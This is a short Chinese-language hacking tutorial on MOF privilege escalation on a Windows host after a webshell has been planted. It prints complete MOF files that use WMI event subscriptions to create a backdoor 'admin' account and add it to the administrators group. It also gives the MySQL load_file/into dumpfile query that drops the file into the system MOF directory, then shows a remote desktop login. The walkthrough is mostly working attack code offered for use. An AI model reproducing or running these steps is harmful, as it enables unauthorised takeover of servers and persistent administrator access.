- 拿下webshell之后當前權限僅限于對網站文件的操作,想要獲取對主機的操作還需進一步提權
- 首先介紹mof提權,直接案例演示
- 找一個可寫目錄上傳mof文件,我這里上傳到了 C:/wmpub/nullevt.mof 代碼如下
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin.admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
-
其中的添加用戶命令,上傳前請自己更改。(不改默認就添加admin)
1.jpg - 執行load_file及into dumpfile把文件導出到正確的位置
select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
2.jpg
- 執行成功,查看用戶(我添加的waitalone)
net user
3.jpg
-
已經成功添加用戶,但此時還是普通用戶,并沒有添加到管理員
4.jpg - 接下來把語句改一下改成添加為管理組,重復上次的步驟
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe localgroup administrators admin /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
5.jpg
- 此時已經是管理組了,遠程桌面連接
mstsc /admin
